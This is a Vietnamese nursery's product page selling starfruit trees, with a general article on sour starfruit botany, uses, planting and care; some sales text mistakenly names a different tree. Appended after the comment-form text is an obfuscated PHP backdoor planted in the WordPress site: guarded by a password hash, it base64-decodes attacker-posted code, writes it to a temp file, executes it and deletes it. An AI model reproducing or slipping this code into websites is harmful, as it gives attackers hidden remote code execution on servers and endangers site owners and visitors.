Bán cây Khế Công trình – Bảo Hành 6 – 12 tháng

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Cây  Khế Công trình là một loại quả rất quen thuộc với người dân Việt Nam, trở thành thứ quả không thể thiếu trong ăn vặt hàng ngày của nhiều người và là gia vị cho nhiều món ăn ngon. Vậy ngoài tiêu thụ khế ra bạn đã biết những thông tin gì về loại cây này chưa? Qua bài viết này https://vuoncayhoabinh.com sẽ cùng các bạn tìm hiểu về cây khế, cụ thể là giống khế chua nhé!

Cây khế chua thuộc họ Oxalidaceae, bắt nguồn từ Sri Lanka và được trồng phổ biến tại cá nước Đông Nam Á. Ngoài ra còn được trồng ở Ghana, Brasil và Guyana. Tại miền nam Floria và Hawaii ( Mỹ ), khế chua cũng được trồng với quy mô thương mại.

Cây khế công trình
Cây khế công trình

Giới thiệu chung về cây khế chua

Ngoài tên khế chua, người ta còn gọi là Ngũ Liêm Tử, Khế Ta hay Khế Cơm.

Tên khoa học của cây là Averrhoa Carambolam, thuộc họ Oxalidaceae, bắt nguồn từ Sri Lanka. Địa biển chủ yếu ở Mỹ, Ghana, Brasil… và vài nơi Đông Nam Á.

Cây khế công trình
Cây khế công trình

Đặc điểm của cây Khế chua

Đặc điểm hình thái

Cây khế chua thuộc loại thân gỗ với chiều cao trung bình lên tới 5m, có nhiều cành và phân cành thấp. Gỗ cây khế rất giòn và dễ gãy.

Lá của cây khế chua có dạng lông chim, mọc kép dài tới 50cm. Lá khế màu xanh mềm, lá kép bao gồm 5 – 11 lá chét. Trong đó có 1 lá mọc ở đỉnh và phía dưới là từng cặp mọc đối diện.

Hoa cây khế mọc thành từng cụm, có màu tím và mọc tại nách lá hoặc đầu cành. Hoa tím nhỏ hình cuông, mỗi hoa rộng khoảng 5 – 6 mm và chia thành 5 cánh.

Quả khế có dạng hình trứng hay elip, dài khoảng 5 – 15 cm và chia thành 5 khía, cắt ngang ra có hình ngôi sao. Da quả khế rất mỏng, mịn và bóng. Khế chua nguyên gốc có màu xanh và chuyển màu vàng đậm khi chín.

Trong mỗi quả có từ 10 – 12 hạt dẹt màu nâu, dài khoảng 0,5 – 1,3cm. Hạt được bao bọc bởi lớp vỏ sền sệt và trong suốt. Nếu tạch hạt ra khỏi quả trong một thời gian thì lớp ngoại bì này sẽ tự động biến mất. 

Cây khế công trình
Cây khế công trình

Đặc điểm sinh lý, sinh thái

Cây khế chua có tốc độ sinh trưởng nhanh và sống được trong nhiều điều kiện khác nhau. Nhưng thích hợp nhất và dễ phát triển là trong miền nhiệt đới. Cây khế thường phát lộc vào mùa xuân và bắt đầu ra hoa vào đầu mùa hạ, cuối thu bắt đầu ra quả.

Khế chua là loài cây có tốc độ sinh trưởng nhanh, sống được ở nhiều điều kiện khác nhau nhưng thích hợp nhất là miền nhiệt đới.

Cây thường phát lộc vào mùa xuân và ra hoa vào đầu hạ, ra quả vào cuối thu.

Khế chua phát triền nhiều chồi nhất là vào tháng 4 hàng năm. Chồi non của cây khế có màu hồng và phủ lông tơ, khi già sẽ tự chuyển màu xanh.

Cây khế công trình
Cây khế công trình

Cây khế chua có công dụng gì?

Cây khế không còn xa lạ với chúng ta và những công dụng của nó cũng được người dân sử dụng triệt để. Đây là loại cây ăn quả phổ biến nhất. Ngoài việc ăn trực tiếp còn là nguyên liệu cho nhiều món ăn ngon.

Khế chua còn được biết tới là loại quả có khả năng chữa nhiều bệnh như cảm nắng, nhức đầu, bí tiểu, viêm họng cấp hay ho…

Bên cạnh đóng vai trò làm thực phẩm thì cây khế còn được trồng trong vườn nhà hay trước sân để đem lại bóng mátNhiều người cũng trồng cây khế nhỏ để làm cây cảnh trang trí.

Kỹ thuật trồng và chăm sóc

Cây khế công trình
Cây khế công trình

Thời vụ trồng cây khế chua

Tại miền Bắc, người ta trồng cây khế chua vào vụ xuân, cụ thể là khoảng tháng 2 – 3. Hoặc cũng có thể là trồng vào tháng 8 – 10 hàng năm. Khoảng cách mỗi cây nên cách nhau từ 4 – 5m và có thể trồng xen kẽ các loại cây khác.

Tiêu chuẩn đất và làm hố trồng khế

Khế chua là loại cây dễ trồng, không yêu cầu nhiều về loại đất. Đất trồng khế chỉ cần tơi xốp, thoát nước tốt và được cày bừa kĩ càng là được. Nhớ nhặt sạch cỏ dại trước khi trồng cây. Nên lên luống tiến hành trồng khế ở nơi trũng, thấp.

Kích thước của hố đào là 0,6 x 0,5 x 0,5m. Nên bón lót vào các hố khoảng 20kg phân chuồng hoại mục, 1kg phân super lân và 1kg vôi bột. Trộn đều hỗn hợp với đất rồi lấp đất lại trên hố. 

Cây khế công trình
Cây khế công trình

Kỹ thuật trồng cây khế chua công trình 

Khi trồng cây bạn nên trồng vào buổi sớm khi trời mát, không nên trồng buổi trưa vì cây dễ bị sốc nhiệt.

Sau khi trồng cây giống vào hố, bạn có thể cắm cọc để cố định cây không bị đổ. Nhớ tưới nước ngay sau đó để đất được cung cấp độ ẩm khoảng 80%.

Khi cây khế đạt độ cao 1m thì tiến hành cắt tỉa cây và tạo tán. Nhớ loại bỏ những cành già khô héo và nhiễm sâu bệnh. Những cành quá rậm rạp cũng nên tỉa bỏ.

Cách chăm sóc cây khế công trình

Điều không thể thiếu với mọi loại cây đó là nước. Bạn cần cung cấp đủ lượng nước cho cây. Vào mua khô nên tưới nhiều nước hơn và trong thời kì trái lớn cũng cần nhiều nước.

Bạn nên nhớ phải luôn phòng trừ cỏ dại bằng việc cắt tỉa và vun xới đất. Cách tốt nhất đó là phủ rơm rạ hoặc cây phân xanh vào gốc.

Muốn cây khế chua ra nhiều quả và chất lượng quả tốt thì bạn phải bón phân định kì và hợp lý cho cây. Lưu ý hàm lượng và thời gian bón sẽ thay đổi qua các năm.

Trên đây là những thông tin bổ ích về cây khế chua mà https://vuoncayhoabinh.com cung cấp cho các bạn.

Chúc các bạn nắm rõ kiến thức về loại cây này và có thể tự trồng cho mình những cây khế đẹp nhé!

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}